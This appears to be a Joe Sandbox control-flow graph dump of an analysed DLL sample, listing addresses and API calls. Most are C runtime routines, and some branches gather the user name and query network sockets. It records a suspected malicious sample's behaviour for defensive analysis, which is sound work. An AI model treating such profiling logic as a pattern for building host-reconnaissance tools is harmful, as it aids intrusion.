13962 1dde610bef3 13961->13962 13965 1dde6105fa4 _DllMainCRTStartup 10 API calls 13961->13965 13966 1dde610bca0 _CRT_INIT 3 API calls 13962->13966 13962->13968 13964->13968 14001 1dde6105fa4 13964->14001 13967 1dde610bee6 13965->13967 13966->13968 13969 1dde610bca0 _CRT_INIT 3 API calls 13967->13969 13969->13962 13971 1dde610bd2f 13970->13971 13974 1dde610bcb2 _heap_init 13970->13974 13972 1dde610bd85 13971->13972 13976 1dde610bd33 _CRT_INIT 13971->13976 13973 1dde610bde8 13972->13973 13980 1dde610bd8a _CRT_INIT 13972->13980 13984 1dde610bcbb _CRT_INIT _mtterm 13973->13984 14072 1dde610fb68 13973->14072 13974->13984 14007 1dde610fd10 13974->14007 13976->13984 14034 1dde610a4cc 13976->14034 13980->13984 14060 1dde610ea88 13980->14060 13983 1dde610bcc7 _RTC_Initialize 13983->13984 14013 1dde6112e20 13983->14013 13984->13964 13985 1dde610bda7 _CRT_INIT 13985->13984 13986 1dde610bdde 13985->13986 13987 1dde610bdc8 13985->13987 14069 1dde610979c 13986->14069 14064 1dde610fc4c 13987->14064 13993 1dde610bcf5 13993->13984 14028 1dde6112984 13993->14028 14002 1dde6106028 14001->14002 14004 1dde6105fc2 _DllMainCRTStartup 14001->14004 14002->13961 14003 1dde610600d 14286 1dde60fba74 14003->14286 14004->14002 14004->14003 14006 1dde6105ffa VirtualFree 14004->14006 14006->14003 14009 1dde610fd1b _mtinit _mtinitlocks 14007->14009 14008 1dde610fd6e _mtterm 14008->13983 14009->14008 14010 1dde610ea88 _calloc_crt RtlFreeHeap 14009->14010 14011 1dde610fd4a _CRT_INIT 14010->14011 14011->14008 14012 1dde610fc4c _initptd RtlFreeHeap 14011->14012 14012->14008 14015 1dde6112e3f 14013->14015 14014 1dde610bce9 14019 1dde61121a0 14014->14019 14015->14014 14076 1dde610eb08 14015->14076 14018 1dde610979c free RtlFreeHeap 14018->14014 14153 1dde610e0ec 14019->14153 14021 1dde61121cf 14022 1dde610ea88 _calloc_crt RtlFreeHeap 14021->14022 14023 1dde61121e3 14022->14023 14024 1dde61121f3 _ioinit _getstream 14023->14024 14025 1dde610ea88 _calloc_crt RtlFreeHeap 14023->14025 14027 1dde61122d4 14023->14027 14024->13993 14025->14023 14026 1dde611242e GetFileType 14026->14027 14027->14024 14027->14026 14029 1dde611299c 14028->14029 14031 1dde61129a1 14028->14031 14172 1dde610f150 14029->14172 14176 1dde6112a78 14031->14176 14035 1dde610a4e3 14034->14035 14036 1dde610a505 14035->14036 14038 1dde610979c free RtlFreeHeap 14035->14038 14037 1dde610979c free RtlFreeHeap 14036->14037 14043 1dde610a514 14037->14043 14038->14035 14039 1dde610a53b 14040 1dde610979c free RtlFreeHeap 14039->14040 14042 1dde610a54a 14040->14042 14041 1dde610979c free RtlFreeHeap 14041->14043 14044 1dde610979c free RtlFreeHeap 14042->14044 14043->14039 14043->14041 14045 1dde610a55e 14044->14045 14046 1dde610979c free RtlFreeHeap 14045->14046 14047 1dde610a56a 14046->14047 14048 1dde610a595 14047->14048 14049 1dde610979c free RtlFreeHeap 14047->14049 14050 1dde610a5b6 14048->14050 14051 1dde610979c free RtlFreeHeap 14048->14051 14049->14048 14052 1dde610a5cf 14050->14052 14053 1dde610979c free RtlFreeHeap 14050->14053 14051->14050 14054 1dde610a600 14052->14054 14055 1dde610979c free RtlFreeHeap 14052->14055 14053->14052 14054->13984 14056 1dde61124cc 14054->14056 14055->14054 14058 1dde61124e7 14056->14058 14057 1dde611252f 14057->13984 14058->14057 14059 1dde610979c free RtlFreeHeap 14058->14059 14059->14058 14062 1dde610eaad 14060->14062 14063 1dde610eaea 14062->14063 14256 1dde6113cf0 14062->14256 14063->13985 14065 1dde610e0ec _lock RtlFreeHeap 14064->14065 14066 1dde610fcb2 _getstream 14065->14066 14067 1dde610e0ec _lock RtlFreeHeap 14066->14067 14068 1dde610fcd1 __addlocaleref _getstream 14067->14068 14068->13984 14070 1dde61097a1 RtlFreeHeap 14069->14070 14071 1dde61097bc _errno _dosmaperr 14069->14071 14070->14071 14071->13984 14073 1dde610fb9e 14072->14073 14074 1dde610fb7c _CRT_INIT 14072->14074 14073->13984 14260 1dde610fa34 14074->14260 14079 1dde610eb30 14076->14079 14078 1dde610eb65 14078->14014 14078->14018 14079->14078 14080 1dde61097dc 14079->14080 14081 1dde6109870 _callnewh 14080->14081 14086 1dde61097f4 _callnewh malloc 14080->14086 14083 1dde610bfd0 _errno RtlFreeHeap 14081->14083 14090 1dde6109865 14083->14090 14085 1dde6109855 14116 1dde610bfd0 14085->14116 14086->14085 14088 1dde610985a 14086->14088 14086->14090 14091 1dde610c0a8 14086->14091 14100 1dde610c11c 14086->14100 14089 1dde610bfd0 _errno RtlFreeHeap 14088->14089 14089->14090 14090->14079 14119 1dde61131b4 14091->14119 14093 1dde610c0b6 14094 1dde610c0c5 14093->14094 14095 1dde61131b4 _set_error_mode RtlFreeHeap 14093->14095 14096 1dde610c11c _NMSG_WRITE RtlFreeHeap 14094->14096 14098 1dde610c0e6 14094->14098 14095->14094 14097 1dde610c0dc 14096->14097 14099 1dde610c11c _NMSG_WRITE RtlFreeHeap 14097->14099 14098->14086 14099->14098 14101 1dde610c150 _NMSG_WRITE 14100->14101 14102 1dde61131b4 _set_error_mode RtlFreeHeap 14101->14102 14115 1dde610c26d _NMSG_WRITE __crtMessageBoxW _invoke_watson 14101->14115 14103 1dde610c166 14102->14103 14104 1dde61131b4 _set_error_mode RtlFreeHeap 14103->14104 14103->14115 14105 1dde610c177 14104->14105 14105->14115 14123 1dde6113060 14105->14123 14107 1dde610c1b3 14108 1dde6113060 _NMSG_WRITE RtlFreeHeap 14107->14108 14110 1dde610c1f3 _NMSG_WRITE 14107->14110 14107->14115 14108->14110 14109 1dde610c23d 14109->14115 14137 1dde6112fd8 14109->14137 14110->14109 14110->14115 14130 1dde61130e8 14110->14130 14112 1dde610c257 14114 1dde6112fd8 _NMSG_WRITE RtlFreeHeap 14112->14114 14112->14115 14114->14115 14115->14086 14144 1dde610fbc8 14116->14144 14120 1dde61131bc 14119->14120 14121 1dde610bfd0 _errno RtlFreeHeap 14120->14121 14122 1dde61131c6 _invalid_parameter_noinfo 14120->14122 14121->14122 14122->14093 14124 1dde611306e 14123->14124 14125 1dde6113078 14123->14125 14124->14125 14127 1dde6113095 14124->14127 14126 1dde610bfd0 _errno RtlFreeHeap 14125->14126 14128 1dde6113081 _invalid_parameter_noinfo 14126->14128 14127->14128 14129 1dde610bfd0 _errno RtlFreeHeap 14127->14129 14128->14107 14129->14128 14134 1dde61130f5 14130->14134 14131 1dde61130fa 14132 1dde610bfd0 _errno RtlFreeHeap 14131->14132 14133 1dde61130ff _invalid_parameter_noinfo 14131->14133 14132->14133 14133->14109 14134->14131 14134->14133 14135 1dde6113138 14134->14135 14135->14133 14136 1dde610bfd0 _errno RtlFreeHeap 14135->14136 14136->14133 14138 1dde6112ff3 14137->14138 14140 1dde6112fe9 14137->14140 14139 1dde610bfd0 _errno RtlFreeHeap 14138->14139 14143 1dde6112ffc _invalid_parameter_noinfo 14139->14143 14140->14138 14141 1dde611302a 14140->14141 14142 1dde610bfd0 _errno RtlFreeHeap 14141->14142 14141->14143 14142->14143 14143->14112 14145 1dde610fbd8 _CRT_INIT 14144->14145 14146 1dde610ea88 _calloc_crt RtlFreeHeap 14145->14146 14152 1dde610bfd9 14145->14152 14147 1dde610fbfa _CRT_INIT 14146->14147 14148 1dde610fc2d 14147->14148 14149 1dde610fc17 14147->14149 14147->14152 14150 1dde610979c free RtlFreeHeap 14148->14150 14151 1dde610fc4c _initptd RtlFreeHeap 14149->14151 14150->14152 14151->14152 14152->14088 14154 1dde610e10a 14153->14154 14156 1dde610e10f 14153->14156 14157 1dde610e1b8 14154->14157 14158 1dde610e1e4 malloc 14157->14158 14159 1dde610e1d5 14157->14159 14162 1dde610eb08 _malloc_crt RtlFreeHeap 14158->14162 14169 1dde610e1ff 14158->14169 14160 1dde610c0a8 _FF_MSGBANNER RtlFreeHeap 14159->14160 14161 1dde610e1da 14160->14161 14163 1dde610c11c _NMSG_WRITE RtlFreeHeap 14161->14163 14164 1dde610e210 14162->14164 14163->14158 14165 1dde610e218 14164->14165 14166 1dde610e227 14164->14166 14167 1dde610bfd0 _errno RtlFreeHeap 14165->14167 14168 1dde610e0ec _lock RtlFreeHeap 14166->14168 14167->14169 14170 1dde610e231 14168->14170 14169->14156 14170->14169 14171 1dde610979c free RtlFreeHeap 14170->14171 14171->14169 14173 1dde610f15d 14172->14173 14174 1dde610f167 14172->14174 14182 1dde610f528 14173->14182 14174->14031 14178 1dde6112ab6 14176->14178 14181 1dde6112b1c 14178->14181 14252 1dde6115238 14178->14252 14179 1dde61129f7 14180 1dde6115238 parse_cmdline RtlFreeHeap 14180->14181 14181->14179 14181->14180 14204 1dde610fba4 14182->14204 14184 1dde610f54c 14207 1dde610f46c 14184->14207 14186 1dde610f554 14214 1dde610f178 14186->14214 14189 1dde610eb08 _malloc_crt RtlFreeHeap 14190 1dde610f578 _setmbcp 14189->14190 14201 1dde610f728 _getstream 14190->14201 14217 1dde610f784 14190->14217 14192 1dde610f61b 14193 1dde610f626 14192->14193 14194 1dde610f73b 14192->14194 14195 1dde610f64a 14193->14195 14198 1dde610979c free RtlFreeHeap 14193->14198 14196 1dde610f754 14194->14196 14199 1dde610979c free RtlFreeHeap 14194->14199 14194->14201 14200 1dde610e0ec _lock RtlFreeHeap 14195->14200 14195->14201 14197 1dde610bfd0 _errno RtlFreeHeap 14196->14197 14197->14201 14198->14195 14199->14196 14202 1dde610f67a 14200->14202 14201->14174 14202->14201 14203 1dde610979c free RtlFreeHeap 14202->14203 14203->14201 14205 1dde610fbc8 _getptd_noexit RtlFreeHeap 14204->14205 14206 1dde610fbaf 14205->14206 14206->14184 14208 1dde610fba4 _getptd RtlFreeHeap 14207->14208 14209 1dde610f47b 14208->14209 14210 1dde610e0ec _lock RtlFreeHeap 14209->14210 14211 1dde610f496 _getstream 14209->14211 14212 1dde610f4a9 14210->14212 14211->14186 14212->14211 14213 1dde610979c free RtlFreeHeap 14212->14213 14213->14211 14222 1dde610c7e0 14214->14222 14218 1dde610f178 getSystemCP RtlFreeHeap 14217->14218 14221 1dde610f7b1 _recalloc 14218->14221 14219 1dde610f7b9 setSBCS _NMSG_WRITE 14219->14192 14221->14219 14238 1dde610f288 14221->14238 14223 1dde610c7f6 14222->14223 14229 1dde610c857 14222->14229 14224 1dde610fba4 _getptd RtlFreeHeap 14223->14224 14225 1dde610c7fb 14224->14225 14226 1dde610c830 14225->14226 14230 1dde61137e8 14225->14230 14228 1dde610f46c __updatetmbcinfo RtlFreeHeap 14226->14228 14226->14229 14228->14229 14229->14189 14229->14201 14231 1dde610fba4 _getptd RtlFreeHeap 14230->14231 14232 1dde61137f3 14231->14232 14233 1dde611381c 14232->14233 14234 1dde611380e 14232->14234 14235 1dde610e0ec _lock RtlFreeHeap 14233->14235 14236 1dde610fba4 _getptd RtlFreeHeap 14234->14236 14237 1dde6113813 _getstream _updatetlocinfoEx_nolock 14235->14237 14236->14237 14237->14226 14239 1dde610f2c4 14238->14239 14245 1dde610f3b1 _NMSG_WRITE 14239->14245 14246 1dde61144f8 14239->14246 14241 1dde610f345 14249 1dde61142f8 14241->14249 14243 1dde610f378 14244 1dde61142f8 __crtLCMapStringA RtlFreeHeap 14243->14244 14244->14245 14245->14219 14247 1dde610c7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 14246->14247 14248 1dde611451c 14247->14248 14248->14241 14250 1dde610c7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 14249->14250 14251 1dde611431d 14250->14251 14251->14243 14253 1dde61151bc 14252->14253 14254 1dde610c7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 14253->14254 14255 1dde61151e0 14254->14255 14255->14178 14257 1dde6113d05 14256->14257 14259 1dde6113d18 _callnewh 14256->14259 14258 1dde610bfd0 _errno RtlFreeHeap 14257->14258 14257->14259 14258->14259 14259->14062 14261 1dde610fa3d 14260->14261 14285 1dde610fb5c 14260->14285 14262 1dde610fa58 14261->14262 14263 1dde610979c free RtlFreeHeap 14261->14263 14264 1dde610fa66 14262->14264 14265 1dde610979c free RtlFreeHeap 14262->14265 14263->14262 14266 1dde610fa74 14264->14266 14267 1dde610979c free RtlFreeHeap 14264->14267 14265->14264 14268 1dde610fa82 14266->14268 14269 1dde610979c free RtlFreeHeap 14266->14269 14267->14266 14270 1dde610fa90 14268->14270 14272 1dde610979c free RtlFreeHeap 14268->14272 14269->14268 14271 1dde610fa9e 14270->14271 14273 1dde610979c free RtlFreeHeap 14270->14273 14274 1dde610faaf 14271->14274 14275 1dde610979c free RtlFreeHeap 14271->14275 14272->14270 14273->14271 14276 1dde610fac7 14274->14276 14277 1dde610979c free RtlFreeHeap 14274->14277 14275->14274 14278 1dde610e0ec _lock RtlFreeHeap 14276->14278 14277->14276 14280 1dde610fad3 14278->14280 14279 1dde610fb00 _getstream 14281 1dde610e0ec _lock RtlFreeHeap 14279->14281 14280->14279 14282 1dde610979c free RtlFreeHeap 14280->14282 14283 1dde610fb12 _freefls _getstream 14281->14283 14282->14279 14284 1dde610979c free RtlFreeHeap 14283->14284 14284->14285 14285->14073 14328 1dde610316c 14286->14328 14288 1dde60fba92 _DllMainCRTStartup 14289 1dde61097dc malloc RtlFreeHeap 14288->14289 14290 1dde60fbb23 _DllMainCRTStartup 14289->14290 14335 1dde61091b4 14290->14335 14292 1dde60fbb81 14293 1dde61091b4 _DllMainCRTStartup 2 API calls 14292->14293 14294 1dde60fbb9b _DllMainCRTStartup 14293->14294 14297 1dde60fbba9 _DllMainCRTStartup 14294->14297 14358 1dde6108910 14294->14358 14296 1dde60fbbb7 14342 1dde60fd744 14296->14342 14297->14296 14298 1dde6108910 _DllMainCRTStartup RtlFreeHeap 14297->14298 14298->14296 14301 1dde6108910 _DllMainCRTStartup RtlFreeHeap 14302 1dde60fbbc5 _DllMainCRTStartup 14301->14302 14303 1dde61097dc malloc RtlFreeHeap 14302->14303 14304 1dde60fbbf2 14303->14304 14305 1dde60fbbff _DllMainCRTStartup 14304->14305 14306 1dde6108910 _DllMainCRTStartup RtlFreeHeap 14304->14306 14307 1dde61091b4 _DllMainCRTStartup 2 API calls 14305->14307 14306->14305 14308 1dde60fbc1c _DllMainCRTStartup 14307->14308 14348 1dde6102de0 14308->14348 14329 1dde61097dc malloc RtlFreeHeap 14328->14329 14330 1dde610318d 14329->14330 14331 1dde61097dc malloc RtlFreeHeap 14330->14331 14334 1dde6103195 _recalloc _DllMainCRTStartup 14330->14334 14332 1dde61031a1 14331->14332 14333 1dde610979c free RtlFreeHeap 14332->14333 14332->14334 14333->14334 14334->14288 14336 1dde61091f3 14335->14336 14337 1dde6109209 _recalloc 14335->14337 14338 1dde61091ff 14336->14338 14339 1dde610920b 14336->14339 14337->14292 14340 1dde61097dc malloc RtlFreeHeap 14338->14340 14362 1dde610bbcc 14339->14362 14340->14337 14344 1dde60fd75d _DllMainCRTStartup 14342->14344 14343 1dde60fbbbc 14343->14301 14343->14302 14344->14343 14377 1dde610744c 14344->14377 14346 1dde60fd791 14382 1dde6107478 14346->14382 14349 1dde6102dfe _DllMainCRTStartup 14348->14349 14545 1dde6107c08 14349->14545 14351 1dde6102e28 14549 1dde610a9ac 14351->14549 14353 1dde6102e3f _DllMainCRTStartup 14552 1dde6102fa8 14353->14552 14355 1dde6102f14 _setmbcp _recalloc _DllMainCRTStartup 14561 1dde6107720 14355->14561 14357 1dde6102f75 14359 1dde6108924 _DllMainCRTStartup 14358->14359 14661 1dde61092ac 14359->14661 14363 1dde610bbf0 14362->14363 14364 1dde610bbe6 14362->14364 14366 1dde610bbf5 14363->14366 14371 1dde610bbfc _callnewh 14363->14371 14365 1dde61097dc malloc RtlFreeHeap 14364->14365 14375 1dde610bbee _dosmaperr 14365->14375 14369 1dde610979c free RtlFreeHeap 14366->14369 14367 1dde610bc02 RtlReAllocateHeap 14367->14371 14367->14375 14368 1dde610bc45 _callnewh 14373 1dde610bfd0 _errno RtlFreeHeap 14368->14373 14369->14375 14370 1dde610bc83 14372 1dde610bfd0 _errno RtlFreeHeap 14370->14372 14371->14367 14371->14368 14371->14370 14374 1dde610bc6a 14371->14374 14372->14375 14373->14375 14376 1dde610bfd0 _errno RtlFreeHeap 14374->14376 14375->14337 14376->14375 14378 1dde610745f 14377->14378 14379 1dde6107458 14377->14379 14387 1dde61076a8 14378->14387 14379->14346 14383 1dde6109b9c _snprintf RtlFreeHeap 14382->14383 14384 1dde61074ec 14383->14384 14385 1dde6109b9c _snprintf RtlFreeHeap 14384->14385 14386 1dde6107502 _DllMainCRTStartup 14385->14386 14386->14343 14394 1dde6109b9c 14387->14394 14389 1dde61076c5 14390 1dde6109b9c _snprintf RtlFreeHeap 14389->14390 14391 1dde6107710 14390->14391 14403 1dde610a364 14391->14403 14397 1dde6109bce _recalloc 14394->14397 14395 1dde6109bd3 14396 1dde610bfd0 _errno RtlFreeHeap 14395->14396 14401 1dde6109bd8 _invalid_parameter_noinfo 14396->14401 14397->14395 14398 1dde6109bf2 14397->14398 14407 1dde610c888 14398->14407 14400 1dde6109c22 14400->14401 14424 1dde610c654 14400->14424 14401->14389 14404 1dde610e04c 14403->14404 14528 1dde610de10 14404->14528 14406 1dde6107464 14406->14346 14408 1dde610c7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 14407->14408 14409 1dde610c8ee 14408->14409 14410 1dde610bfd0 _errno RtlFreeHeap 14409->14410 14411 1dde610c8f3 14410->14411 14412 1dde610d253 14411->14412 14422 1dde610c920 _snprintf 14411->14422 14445 1dde610fdb4 14411->14445 14413 1dde610bfd0 _errno RtlFreeHeap 14412->14413 14415 1dde610d258 _invalid_parameter_noinfo _NMSG_WRITE 14413->14415 14415->14400 14417 1dde610d2a8 RtlFreeHeap write_char 14417->14422 14418 1dde610979c free RtlFreeHeap 14418->14422 14419 1dde610eb08 _malloc_crt RtlFreeHeap 14419->14422 14420 1dde6113af4 RtlFreeHeap _snprintf 14420->14422 14421 1dde610ddbc RtlFreeHeap write_multi_char 14421->14422 14422->14412 14422->14415 14422->14417 14422->14418 14422->14419 14422->14420 14422->14421 14423 1dde610d2f0 RtlFreeHeap write_string 14422->14423 14449 1dde61138c4 14422->14449 14423->14422 14425 1dde610fdb4 _fileno RtlFreeHeap 14424->14425 14426 1dde610c676 14425->14426 14427 1dde610c681 14426->14427 14428 1dde610c698 14426->14428 14429 1dde610bfd0 _errno RtlFreeHeap 14427->14429 14430 1dde610c69d 14428->14430 14438 1dde610c6aa write_char 14428->14438 14440 1dde610c686 14429->14440 14431 1dde610bfd0 _errno RtlFreeHeap 14430->14431 14431->14440 14432 1dde610c70f 14433 1dde610c7a7 14432->14433 14434 1dde610c71c 14432->14434 14435 1dde6110794 _flush RtlFreeHeap 14433->14435 14436 1dde610c738 14434->14436 14441 1dde610c751 14434->14441 14435->14440 14461 1dde6110794 14436->14461 14438->14432 14438->14440 14442 1dde610c703 14438->14442 14452 1dde611346c 14438->14452 14440->14401 14441->14440 14478 1dde6111f68 14441->14478 14442->14432 14458 1dde61134cc 14442->14458 14446 1dde610fdbd 14445->14446 14448 1dde610fdc2 _invalid_parameter_noinfo 14445->14448 14447 1dde610bfd0 _errno RtlFreeHeap 14446->14447 14447->14448 14448->14422 14450 1dde610c7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 14449->14450 14451 1dde61138d6 14450->14451 14451->14422 14453 1dde6113475 14452->14453 14455 1dde6113482 14452->14455 14454 1dde610bfd0 _errno RtlFreeHeap 14453->14454 14456 1dde611347a _invalid_parameter_noinfo 14454->14456 14455->14456 14457 1dde610bfd0 _errno RtlFreeHeap 14455->14457 14456->14442 14457->14456 14459 1dde610eb08 _malloc_crt RtlFreeHeap 14458->14459 14460 1dde61134e5 14459->14460 14460->14432 14462 1dde61107cf 14461->14462 14463 1dde61107b7 14461->14463 14465 1dde6110846 14462->14465 14468 1dde6110801 14462->14468 14498 1dde610bf60 14463->14498 14467 1dde610bf60 __doserrno RtlFreeHeap 14465->14467 14469 1dde611084b 14467->14469 14501 1dde611461c 14468->14501 14472 1dde610bfd0 _errno RtlFreeHeap 14469->14472 14470 1dde610bfd0 _errno RtlFreeHeap 14476 1dde61107c4 _invalid_parameter_noinfo _unlock_fhandle 14470->14476 14472->14476 14473 1dde6110808 14474 1dde610bfd0 _errno RtlFreeHeap 14473->14474 14473->14476 14475 1dde611082a 14474->14475 14477 1dde610bf60 __doserrno RtlFreeHeap 14475->14477 14476->14440 14477->14476 14479 1dde6111fa3 14478->14479 14480 1dde6111f8b 14478->14480 14482 1dde611201d 14479->14482 14486 1dde6111fd5 14479->14486 14481 1dde610bf60 __doserrno RtlFreeHeap 14480->14481 14483 1dde6111f90 14481->14483 14484 1dde610bf60 __doserrno RtlFreeHeap 14482->14484 14487 1dde610bfd0 _errno RtlFreeHeap 14483->14487 14485 1dde6112022 14484->14485 14488 1dde610bfd0 _errno RtlFreeHeap 14485->14488 14489 1dde611461c __lock_fhandle RtlFreeHeap 14486->14489 14490 1dde6111f98 _invalid_parameter_noinfo _unlock_fhandle 14487->14490 14488->14490 14491 1dde6111fdc 14489->14491 14490->14440 14492 1dde6111fe8 14491->14492 14493 1dde6111ffa 14491->14493 14505 1dde611204c 14492->14505 14495 1dde610bfd0 _errno RtlFreeHeap 14493->14495 14496 1dde6111fff 14495->14496 14497 1dde610bf60 __doserrno RtlFreeHeap 14496->14497 14497->14490 14499 1dde610fbc8 _getptd_noexit RtlFreeHeap 14498->14499 14500 1dde610bf69 14499->14500 14500->14470 14502 1dde6114654 14501->14502 14504 1dde611465e _getstream 14501->14504 14503 1dde610e0ec _lock RtlFreeHeap 14502->14503 14503->14504 14504->14473 14513 1dde6114958 14505->14513 14507 1dde611206b 14508 1dde6112071 14507->14508 14511 1dde6112082 14507->14511 14509 1dde610bfd0 _errno RtlFreeHeap 14508->14509 14510 1dde6112076 14509->14510 14510->14490 14511->14510 14523 1dde610bf80 14511->14523 14514 1dde6114961 14513->14514 14515 1dde6114976 14513->14515 14516 1dde610bf60 __doserrno RtlFreeHeap 14514->14516 14517 1dde610bf60 __doserrno RtlFreeHeap 14515->14517 14522 1dde611496e _invalid_parameter_noinfo 14515->14522 14518 1dde6114966 14516->14518 14519 1dde61149b0 14517->14519 14520 1dde610bfd0 _errno RtlFreeHeap 14518->14520 14521 1dde610bfd0 _errno RtlFreeHeap 14519->14521 14520->14522 14521->14522 14522->14507 14524 1dde610fbc8 _getptd_noexit RtlFreeHeap 14523->14524 14525 1dde610bf91 14524->14525 14526 1dde610fbc8 _getptd_noexit RtlFreeHeap 14525->14526 14527 1dde610bfaa _dosmaperr 14526->14527 14527->14510 14529 1dde610c7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 14528->14529 14531 1dde610de3c 14529->14531 14530 1dde610de57 14532 1dde610bfd0 _errno RtlFreeHeap 14530->14532 14531->14530 14534 1dde610de6c 14531->14534 14537 1dde610de5c _invalid_parameter_noinfo 14532->14537 14535 1dde610debe 14534->14535 14538 1dde6113b08 14534->14538 14536 1dde610bfd0 _errno RtlFreeHeap 14535->14536 14535->14537 14536->14537 14537->14406 14539 1dde610c7e0 _LocaleUpdate::_LocaleUpdate RtlFreeHeap 14538->14539 14540 1dde6113b2a 14539->14540 14541 1dde6113b34 14540->14541 14542 1dde61138c4 _isleadbyte_l RtlFreeHeap 14540->14542 14541->14534 14543 1dde6113b57 14542->14543 14544 1dde61144f8 __crtGetStringTypeA RtlFreeHeap 14543->14544 14544->14541 14546 1dde6107c25 _DllMainCRTStartup 14545->14546 14567 1dde60f08bc 14546->14567 14548 1dde6107c56 _DllMainCRTStartup 14548->14351 14550 1dde610fba4 _getptd RtlFreeHeap 14549->14550 14551 1dde610a9b9 14550->14551 14551->14353 14553 1dde610316c _DllMainCRTStartup RtlFreeHeap 14552->14553 14554 1dde6102fd1 _DllMainCRTStartup 14553->14554 14555 1dde610301f GetUserNameA 14554->14555 14556 1dde6103048 14555->14556 14573 1dde60fd570 14556->14573 14558 1dde610304d strrchr _DllMainCRTStartup 14559 1dde6109b9c _snprintf RtlFreeHeap 14558->14559 14560 1dde6103120 _DllMainCRTStartup 14559->14560 14560->14355 14562 1dde6107752 _setmbcp _DllMainCRTStartup 14561->14562 14582 1dde60f0cc4 14562->14582 14564 1dde610780e 14566 1dde610785d 14564->14566 14602 1dde60f0b64 14564->14602 14566->14357 14569 1dde60f08ec _DllMainCRTStartup 14567->14569 14568 1dde60f090d 14568->14548 14569->14568 14570 1dde61097dc malloc RtlFreeHeap 14569->14570 14572 1dde60f0921 14570->14572 14571 1dde610979c free RtlFreeHeap 14571->14568 14572->14568 14572->14571 14580 1dde60fd668 14573->14580 14575 1dde60fd58b WSASocketA 14576 1dde60fd5ad 14575->14576 14577 1dde60fd5b4 WSAIoctl 14575->14577 14576->14558 14578 1dde60fd5f5 closesocket 14577->14578 14578->14576 14581 1dde60fd67c _DllMainCRTStartup 14580->14581 14581->14575 14583 1dde60f0d5e _DllMainCRTStartup 14582->14583 14601 1dde60f0d77 _NMSG_WRITE _DllMainCRTStartup 14583->14601 14606 1dde61192c8 14583->14606 14585 1dde60f0d6f _DllMainCRTStartup 14586 1dde60f0f0c 14585->14586 14591 1dde60f0e6d 14585->14591 14585->14601 14587 1dde610979c free RtlFreeHeap 14586->14587 14588 1dde60f0f14 14587->14588 14590 1dde60f3e64 _DllMainCRTStartup RtlFreeHeap 14588->14590 14597 1dde60f0f40 14590->14597 14613 1dde60f3e64 14591->14613 14593 1dde60f0ef3 14595 1dde610979c free RtlFreeHeap 14593->14595 14594 1dde60f0efd 14596 1dde610979c free RtlFreeHeap 14594->14596 14595->14601 14596->14601 14598 1dde60f3e64 _DllMainCRTStartup RtlFreeHeap 14597->14598 14600 1dde60f105c 14597->14600 14597->14601 14598->14600 14599 1dde60f3e64 _DllMainCRTStartup RtlFreeHeap 14599->14601 14600->14599 14600->14601 14601->14564 14603 1dde60f0ba5 _DllMainCRTStartup 14602->14603 14605 1dde60f0b9b _DllMainCRTStartup 14602->14605 14603->14605 14619 1dde60f360c 14603->14619 14605->14566 14607 1dde6113cf0 _calloc_impl RtlFreeHeap 14606->14607 14609 1dde61192dd 14607->14609 14608 1dde61192fa 14608->14585 14609->14608 14610 1dde610bfd0 _errno RtlFreeHeap 14609->14610 14611 1dde61192f0 14610->14611 14611->14608 14612 1dde610bfd0 _errno RtlFreeHeap 14611->14612 14612->14608 14615 1dde60f3e90 14613->14615 14614 1dde60f0eea 14614->14593 14614->14594 14615->14614 14616 1dde61192c8 _DllMainCRTStartup RtlFreeHeap 14615->14616 14617 1dde60f3ecf _DllMainCRTStartup 14616->14617 14617->14614 14618 1dde610979c free RtlFreeHeap 14617->14618 14618->14614 14620 1dde60f363d _DllMainCRTStartup 14619->14620 14621 1dde61097dc malloc RtlFreeHeap 14620->14621 14630 1dde60f3893 14620->14630 14622 1dde60f36ae 14621->14622 14623 1dde61097dc malloc RtlFreeHeap 14622->14623 14624 1dde60f36b8 14623->14624 14625 1dde61097dc malloc RtlFreeHeap 14624->14625 14626 1dde60f36c3 14625->14626 14627 1dde60f3897 14626->14627 14629 1dde60f389f 14626->14629 14631 1dde60f36e1 14626->14631 14632 1dde610979c free RtlFreeHeap 14627->14632 14628 1dde60f38ac 14628->14630 14634 1dde610979c free RtlFreeHeap 14628->14634 14629->14628 14633 1dde610979c free RtlFreeHeap 14629->14633 14630->14605 14635 1dde60f08bc _DllMainCRTStartup RtlFreeHeap 14631->14635 14632->14629 14633->14628 14634->14630 14641 1dde60f3723 _setmbcp _recalloc 14635->14641 14636 1dde610979c free RtlFreeHeap 14637 1dde60f3883 14636->14637 14638 1dde610979c free RtlFreeHeap 14637->14638 14639 1dde60f388b 14638->14639 14640 1dde610979c free RtlFreeHeap 14639->14640 14640->14630 14645 1dde60f3797 _setmbcp 14641->14645 14646 1dde60f44f0 14641->14646 14643 1dde60f37bf 14643->14643 14644 1dde60f44f0 _DllMainCRTStartup RtlFreeHeap 14643->14644 14643->14645 14644->14645 14645->14636 14647 1dde60f451c _DllMainCRTStartup 14646->14647 14648 1dde60f4639 14647->14648 14649 1dde61097dc malloc RtlFreeHeap 14647->14649 14648->14643 14650 1dde60f453f 14649->14650 14651 1dde61097dc malloc RtlFreeHeap 14650->14651 14652 1dde60f454a 14651->14652 14653 1dde60f4645 14652->14653 14654 1dde60f463d 14652->14654 14660 1dde60f455f 14652->14660 14653->14648 14656 1dde610979c free RtlFreeHeap 14653->14656 14655 1dde610979c free RtlFreeHeap 14654->14655 14655->14653 14656->14648 14657 1dde610979c free RtlFreeHeap 14658 1dde60f4631 14657->14658 14659 1dde610979c free RtlFreeHeap 14658->14659 14659->14648 14660->14657 14662 1dde610933c 14661->14662 14667 1dde61092c6 _recalloc 14661->14667 14663 1dde610979c free RtlFreeHeap 14662->14663 14665 1dde610934d 14662->14665 14663->14665 14664 1dde6108939 14665->14664 14666 1dde610979c free RtlFreeHeap 14665->14666 14666->14664 14667->14662 14668 1dde610979c free RtlFreeHeap 14667->14668 14668->14667

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001DDE60F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1dde60f0000_SO2mdwWVvg.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NameSocketUser_snprintfmallocstrrchr
                                                                  • String ID:
